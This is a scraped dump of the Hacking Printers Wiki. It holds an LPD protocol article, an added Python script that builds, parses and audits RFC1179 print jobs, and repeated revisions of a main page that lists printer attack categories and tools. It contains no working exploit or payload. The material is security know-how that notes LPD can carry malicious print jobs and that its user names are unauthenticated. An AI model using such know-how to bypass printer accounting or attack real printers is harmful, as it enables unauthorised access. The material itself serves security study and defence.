The Line Printer Daemon (LPD) protocol was originally introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network.

To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However, it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating systems is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>.

LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below:

 lpdprint.py hostname filename

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]]
----
0f6dc281d306f7d119582c04d736cdcbb289f15f
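The LPD article above describes the control file (job and user name) and the data file a client sends to port 515/tcp. The following Python script is added here as an illustration; it is not code from this wiki, from LPRng or from PRET's lpdprint. It builds the RFC1179 receive-job byte stream for one job, parses it back the way a daemon would, and then checks the client-supplied H (host) and P (user) control lines against the connecting peer. The queue name, host names, user name and the `audit_job` policy are assumptions for illustration.

```python
"""RFC1179 (LPD) job stream builder, parser and audit helper, added as an illustration."""

LPD_PORT = 515
CMD_RECEIVE_JOB = b"\x02"     # "receive a printer job" (RFC1179 section 5.2)
SUB_CONTROL_FILE = b"\x02"    # subcommands inside a job (RFC1179 section 6)
SUB_DATA_FILE = b"\x03"


def build_control_file(host, user, job_name, data_file, fmt="l"):
    """Control file lines (RFC1179 section 7): H host, P user, J job name, <fmt> data file,
    U unlink after printing, N source name. 'l' prints the file as-is, 'f' formatted."""
    lines = [f"H{host}", f"P{user}", f"J{job_name}", f"{fmt}{data_file}",
             f"U{data_file}", f"N{job_name}"]
    return ("\n".join(lines) + "\n").encode("ascii")


def build_job(queue, host, user, job_name, data, job_number=1, fmt="l"):
    """Bytes a client writes to port 515 for one job: the receive-job command, then the
    control and data file, each announced as '<size> <name>\\n' and NUL-terminated.
    File names are cfA/dfA + three-digit job number + client host name."""
    job_id = f"{job_number:03d}{host}"
    cf = build_control_file(host, user, job_name, f"dfA{job_id}", fmt)
    stream = CMD_RECEIVE_JOB + queue.encode("ascii") + b"\n"
    stream += SUB_CONTROL_FILE + f"{len(cf)} cfA{job_id}\n".encode("ascii") + cf + b"\x00"
    stream += SUB_DATA_FILE + f"{len(data)} dfA{job_id}\n".encode("ascii") + data + b"\x00"
    return stream


def parse_control_file(cf):
    """Map each line's one-letter command to its operands, in order of appearance."""
    fields = {}
    for line in cf.decode("ascii", "replace").splitlines():
        if line:
            fields.setdefault(line[0], []).append(line[1:])
    return fields


def parse_job_stream(stream):
    """Daemon-side view of build_job's output (acknowledgement bytes omitted):
    returns (queue, parsed control file, {data file name: bytes})."""
    if stream[:1] != CMD_RECEIVE_JOB:
        raise ValueError("not a receive-job command")
    nl = stream.index(b"\n")
    queue = stream[1:nl].decode("ascii")
    pos, control, data_files = nl + 1, None, {}
    while pos < len(stream):
        sub = stream[pos:pos + 1]
        nl = stream.index(b"\n", pos)
        size_s, name = stream[pos + 1:nl].decode("ascii").split(" ", 1)
        size = int(size_s)
        body = stream[nl + 1:nl + 1 + size]
        if len(body) != size or stream[nl + 1 + size:nl + 2 + size] != b"\x00":
            raise ValueError(f"truncated or unterminated file {name}")
        pos = nl + 2 + size
        if sub == SUB_CONTROL_FILE:
            control = parse_control_file(body)
        elif sub == SUB_DATA_FILE:
            data_files[name] = body
        else:
            raise ValueError(f"unknown subcommand {sub!r}")
    return queue, control, data_files


def audit_job(control, peer_host):
    """Return (claimed user, findings). H and P are written by the client, so an
    accounting system that trusts them is trusting client input; comparing H with
    the connecting peer is one cheap sanity check (assumed policy, not LPRng's)."""
    findings = []
    claimed_host = control.get("H", [""])[0]
    user = control.get("P", [""])[0]
    if claimed_host != peer_host:
        findings.append(f"H line {claimed_host!r} differs from connecting host {peer_host!r}")
    if not user:
        findings.append("control file carries no P (user) line")
    return user, findings


if __name__ == "__main__":
    # constructed sample job: queue 'lp', client 'client1', user 'alice'
    stream = build_job("lp", "client1", "alice", "report", b"hello\n", job_number=7)
    queue, control, files = parse_job_stream(stream)
    print(queue, control, list(files))
    print(audit_job(control, "client1"))
```

Nothing in the control file is authenticated: the daemon learns the user only from the P line, which is the reason the [[Accounting bypass]] article treats LPD user names as untrusted. The parser rejects a stream whose file body is shorter than announced or lacks its terminating NUL, which is also where a fuzzer targeting LPD implementations usually starts.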
Main Page 0 1 648 645 2017-10-13T09:06:06Z Admin 1 Undo revision 645 by [[Special:Contributions/85.98.95.146|85.98.95.146]] ([[User talk:85.98.95.146|talk]]) wikitext text/x-wiki
<div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;">
<div id="mp-tfl" style="padding:0px 6px;">
This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security.
</div>
</div>
<!-- TODAY'S FEATURED CONTENT -->
{| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"
<!-- ATTACKS -->
| class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" |
{| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;"
| style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2>
|-
|
* '''[[Denial of service]]''':
** [[Transmission channel]]
** [[Document processing]]
** [[Physical damage]]
* '''[[Privilege escalation]]''':
** [[Factory defaults]]
** [[Accounting bypass]]
** [[Fax and Scanner]]
* '''[[Print job access]]''':
** [[Print job retention]]
** [[Print job manipulation]]
* '''[[Information disclosure]]''':
** [[Memory access]]
** [[File system access]]
** [[Credential disclosure]]
* '''[[Code execution]]''':
** [[Buffer overflows]]
** [[Firmware updates]]
** [[Software packages]]
|-
| style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2>
|-
|
<div style="padding:0px 8px;">
Check out the [[Printer Security Testing Cheat Sheet]]
</div>
|}
| style="border:1px solid transparent;" |
<!-- OTHER STUFF -->
| class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"|
{| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;"
| style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2>
|-
|
* [[PRET]], [[Praeda]], [[PFT]], [[BeEF]]
|-
| style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2>
|-
|
* '''[[Fundamentals#Printer Control Languages|Printer languages]]'''
** [[PJL]], [[PCL]], [[PostScript]]
* '''[[Fundamentals#Network printing protocols|Network protocols]]'''
** [[LPD]], [[IPP]], [[Raw]], [[SMB]]
|-
| style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2>
|-
|
* [[USB drive or cable]]
* [[Port 9100 printing]]
* [[Cross-site printing]]
|-
| style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2>
|-
|
* [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]]
|-
| style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2>
|-
|
* [[Bibliography|Literature on printer security]]
|-
| style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2>
|-
|
* [[References|Printer language references]]
|}
|}
<table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;">
<tr>
<td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;">
<table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;">
<tr>
<td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td>
</tr><tr>
<td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Coming soon: ''Hacking PostScript processing websites''</div></td>
</tr>
</table>
</td>
</tr>
</table>
<!--
<div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;">
<h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2>
<div id="mp-tfl" style="padding:6px 6px;">
Hacking PostScript Processors / websites
</div>
</div>
---------------
Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software.

== Getting started ==
* [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list]
* [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ]
* [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list]
* [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language]
-->
__NOTOC__
d79b6a1fd4889be34850f7bb2c070683a9802a7f
</div> </div> <!-- TODAY'S FEATURED CONTENT ( RAMADAN ŞANLI) --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS ( RAMADAN ŞANLI) --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF ( RAMADAN ŞANLI) --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], 
[[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; 
background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Coming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 82349dc403f5d20980dc2be4516fcd331fed5e51 217 216 2017-01-23T18:22:23Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. 
</div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" 
style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td 
style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Coming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ d79b6a1fd4889be34850f7bb2c070683a9802a7f 216 165 2017-01-23T18:19:34Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. 
</div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" 
style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PostScript]], [[PJL]], [[PCL]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td 
style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Coming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 68bf433137f88c02cbc105c881badeed1c03d2a2 165 61 2017-01-20T15:45:49Z 77.182.101.158 0 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. 
</div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" 
